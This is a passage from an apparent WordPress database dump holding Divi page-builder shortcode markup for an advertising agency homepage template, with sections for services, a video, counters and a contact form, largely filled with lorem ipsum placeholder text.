animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-04 22:00:02','2020-07-04 22:00:02','',134,'https://52.66.212.87/2020/07/04/134-revision-v1/',0,'revision','',0),(187,1,'2020-07-04 22:03:29','2020-07-04 22:03:29','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" hover_enabled=\"0\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"48px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving Big Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" 